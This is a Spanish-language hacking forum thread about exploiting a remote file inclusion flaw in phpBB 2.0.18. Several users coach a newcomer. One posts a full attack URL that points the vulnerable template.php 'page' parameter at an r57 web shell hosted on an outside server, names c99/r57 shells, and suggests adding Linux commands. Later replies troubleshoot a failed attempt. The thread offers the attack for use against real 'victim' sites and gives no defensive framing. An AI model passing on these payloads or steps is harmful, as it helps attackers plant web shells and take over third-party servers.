Explotar Vulnerabilidad Phpbb 2.0.18

[H7x]

Hola a todos.
Quisiera saber como puedo explotar esta vulnerabilidad para phpbb que encontre en security focus.

Para ver este enlace Registrate o Inicia Sesion
eh leido un poco sobre RFI y tengo algunos conceptos basicos.

la parte que no entiendo es que debo de poner en [attacker]

Para ver este enlace Registrate o Inicia Sesion[path_to_phpbb]/template.php?page=[attacker]

y si template.php es constante?

gracias

[OzX]

hola

Creo que template.php deve ser una sentencia constante, porque el mismo titulo dice que es para esa version ,  y esa version viene con template.php en toda esa version.. y es por eso que tenga es vulnerabilidad .. no creo que esa variable cambie.. solo que para esa version es fija, talves para otras version en donde salga template, diga index.php


en donde dice [path_to_phpbb] ahy que poner donde esta situado el foro ... todo esto varia segun la url de sitio ej:

Para ver este enlace Registrate o Inicia Sesion

www.ejample.co m/foro/

en path_to_phpbb tendria que ir foro..
osea

Para ver este enlace Registrate o Inicia Sesion

www.example.co m/foro/index.php?page=ataccker

en atack... talves tendria que poner una shell que tengas...

kedaria

Para ver este enlace Registrate o Inicia Sesion

www.example.co m/foro/index.php?page=direcciondelashell

si tengo algo mal.. que porfavor alguien diga, porque no me acuerdo muy bien de esto ,
tengo que repasar¡¡¡
saludos
adios

[CiberPunk]

Hola, para empezar en [attacker] tienes que ubicar tu shell, ya sea la c99.txt o la r57shell.txt

esta es una shell:
Para ver este enlace Registrate o Inicia Sesion

http://svt.nukleon.us/tools/r57shell.txt

ahora en [path_to_phpbb] no hay que hacer nada, es solo para ubicar el directorio.

Ejemplo:


Para ver este enlace Registrate o Inicia Sesion

www.victima.co m/indice/subindice/template.php

ah entonces el path o directorio es: indice/subindice.

exacto ese el path, o script_path, etc...

Lo importante de esta vulnerabilidad es encontrar el "template.php".
Para que ?
Bien el template.php es un fichero que tiene un codigo vulnerable en la variable $include, ese codigo vulnerable se ubica en "page=" que permite tener el acceso o un lisatado del dominio. dependiendo de que comandos linuz uses.

Bien entonces al final simplemente are esto:


Para ver este enlace Registrate o Inicia Sesion

www.victima.co m/indice/subindice/template.php?page=http://svt.nukleon.us/tools/r57shell.txt?

Listo, si no funciona añadale algunos comandos de linux y veras que funciona

ahora no podria ser asi:


Para ver este enlace Registrate o Inicia Sesion

www.example.co m/foro/index.php?page=ataccker

por que te votaria directorio no encontrado o no mostraria nada

Greetings::::

[OzX]

muy buena explicacion men, mas que la mia jejejejej
saludos
adios¡¡¡¡

[ricardo345]

podria ser así???

Para ver este enlace Registrate o Inicia Sesion

no me resulta, que anda mal??

[OzX]

fijate bien.. no ahy template

Para ver este enlace Registrate o Inicia Sesion

saludos
adios